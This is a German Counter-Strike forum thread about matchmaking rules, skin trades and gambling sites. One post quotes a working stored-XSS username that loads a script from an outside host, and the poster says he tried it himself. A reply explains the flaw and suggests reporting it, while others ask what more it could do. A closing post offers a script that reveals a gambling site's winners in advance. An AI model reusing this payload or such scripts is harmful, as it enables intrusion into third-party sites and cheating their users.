Counter-Strike Chit-Chat II

10/02/2015 20:15 Kyrishix#13906
Quote:
Originally Posted by Lichslap View Post
Wenn man so drüber nachdenkt ist das aber echt bitter:D
Das System an sich finde ich gar nicht so verkehrt, aber dass es auch bei ehemaligen Spielern (Ich war MG1, bevor ich ein paar Monate halt Pause gemacht habe) greift, finde ich etwas unsinnig.

Quote:
Originally Posted by Lichslap View Post
Wenn dann keine Operation läuft darf man nach 1k Stunden Playedtime 2 Matches gewinnen nur um wieder 1 Tag zu warten :D ( jaja ich weis das war übertrieben )
Das mit den zwei Matches am Tag gilt ja soweit ich weiß aber nur für neue Accounts und nicht für welche, die bereits geranked wurden sind oder schon mal geranked waren.
10/02/2015 21:25 PreHax#13907
die können das auch gern auf level10 erhöhen, weniger Hacker/weniger Smurfer

( außer du hast sie jetzt schon hochgelevelt )
10/02/2015 22:23 deniz619#13908
hat jmd hier vllt bock auf Epvp intern 5vs5? wäre bestimmt nice
10/02/2015 23:25 Polytoxic#13909
wollte mich mal wieder an cs:s rantasten, zumal die fps da auch stimmen ;)

kann mir jmd "matchmaking"-server empfehlen?
10/03/2015 14:44 mystic =D#13910
Quote:
Das mit den zwei Matches am Tag gilt ja soweit ich weiß aber nur für neue Accounts und nicht für welche, die bereits geranked wurden sind oder schon mal geranked waren.
Korrekt!
10/03/2015 15:11 Sevvi#13911
mitlerweile macht mir faceit mehr spaß als mm, aber wenn ich mir dann premium kaufe, muss ich auch schwitzen, dann machts mir keinen spaß mehr.
ws hat premium für einen sinn xd
10/03/2015 15:12 LiiVE2RAVE#13912
Mein Vanilla Butterfly gegen sein M9 Bajo Case Hardened Well Worn?

Steam market sagt ja, steamanalyst und csgostash aber nein :D
Kann mir wer helfen?
10/03/2015 15:15 Akiao#13913
Quote:
Originally Posted by LiiVE2RAVE View Post
Mein Vanilla Butterfly gegen sein M9 Bajo Case Hardened Well Worn?

Steam market sagt ja, steamanalyst und csgostash aber nein :D
Kann mir wer helfen?
wie viel Blue?
10/03/2015 15:21 LiiVE2RAVE#13914
Quote:
Originally Posted by Akiao View Post
wie viel Blue?
wenig :D

habe null ahnung von sowas.
auf der playside ist fast gar kein blue, nur ein kleiner klecks :D

EDIT: 45% blue ps sagt er
10/03/2015 16:31 F.Gump#13915
Quote:
Originally Posted by LiiVE2RAVE View Post
wenig :D

habe null ahnung von sowas.
auf der playside ist fast gar kein blue, nur ein kleiner klecks :D

EDIT: 45% blue ps sagt er
wenn du sowas hörst direkt ignorieren, is ganz normales pattern wenn nicht sogar schlecht lacho
10/03/2015 17:53 KwPJagTqzqC3#13916
Hab soeben nen Spieler gesehen, der auf ner Gamblingseite keinen Namen hatte. Hab ihn dann gefunden und sein namen lautete wie folgt: <script src=http://um.noip.me/s>.
Er meint er kann damit diverse Gamblingseiten "Hacken".
Ich finde das ganze etwas merkwürdig, hab mich selbst so umbenannt und mich auf ner Gamblingseite eingeloggt und hatte auch keinen Namen. Links unten im Firefox stand: "verbinde mit um.noip.me" und es hat ewig lange geladen.

Habt ihr ne Ahnung was es damit auf sich hat?
10/03/2015 18:13 Mr. Highlife#13917
Quote:
Originally Posted by EinEpischerApfel View Post
Hab soeben nen Spieler gesehen, der auf ner Gamblingseite keinen Namen hatte. Hab ihn dann gefunden und sein namen lautete wie folgt: <script src=http://um.noip.me/s>.
Er meint er kann damit diverse Gamblingseiten "Hacken".
Ich finde das ganze etwas merkwürdig, hab mich selbst so umbenannt und mich auf ner Gamblingseite eingeloggt und hatte auch keinen Namen. Links unten im Firefox stand: "verbinde mit um.noip.me" und es hat ewig lange geladen.

Habt ihr ne Ahnung was es damit auf sich hat?
Normalerweise sollte sowas nicht geparsed werden, aber je nach Qualität der Gamblingseite kann es schonmal vorkommen, dass es doch geparsed wird. Dann versucht halt der Browser, statt dem Namen ein Script von noip.me zu laden. Schreibs am besten mal dem Support dort, kann man schließlich wesentlich dümmeres anstellen als nur den Namen zu verbergen.
10/03/2015 20:28 Mc Salamander#13918
Quote:
Originally Posted by Mr. Highlife View Post
Normalerweise sollte sowas nicht geparsed werden, aber je nach Qualität der Gamblingseite kann es schonmal vorkommen, dass es doch geparsed wird. Dann versucht halt der Browser, statt dem Namen ein Script von noip.me zu laden. Schreibs am besten mal dem Support dort, kann man schließlich wesentlich dümmeres anstellen als nur den Namen zu verbergen.
Genau das war ja die Frage. Sind wir nicht das Forum um uns über so "Dummheiten" zu unterhalten? :awesome:
10/03/2015 20:52 KwPJagTqzqC3#13919
Quote:
Originally Posted by Mr. Highlife View Post
Was könnte man denn damit so anstellen? :pimp:
10/04/2015 02:01 False#13920
Wieso kann ich bei Wettkampf nicht jede Map spielen ;O ?

Ps. brauch wer ein script für csgo-pool.con womit man direkt sieht wer gewonnen hat ? :D
Ist funny die Leute dort aufzuregen weil ich es vorher im Chat schreibe :D